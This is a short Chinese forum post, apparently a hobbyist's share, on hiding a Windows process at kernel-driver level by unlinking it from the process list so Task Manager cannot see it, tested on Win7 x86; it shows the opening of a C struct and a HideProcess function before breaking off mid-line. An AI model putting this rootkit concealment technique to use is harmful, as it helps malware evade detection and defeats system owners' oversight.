摘链专题

[驱动] 隐藏进程 驱动级 摘链 任务管理器看不到

闲着蛋疼写来玩玩练练手 没啥技术含量 只是个简单的摘链 任务管理器看不到 测试环境 Win7 x86 typedef struct {DWORD_PTR EProcess;UCHAR* ImageName;ULONG ProcessID;}_Process_Info;NTSTATUS HideProcess(){DWORD_PTR CurrentEProcess = (DWORD_P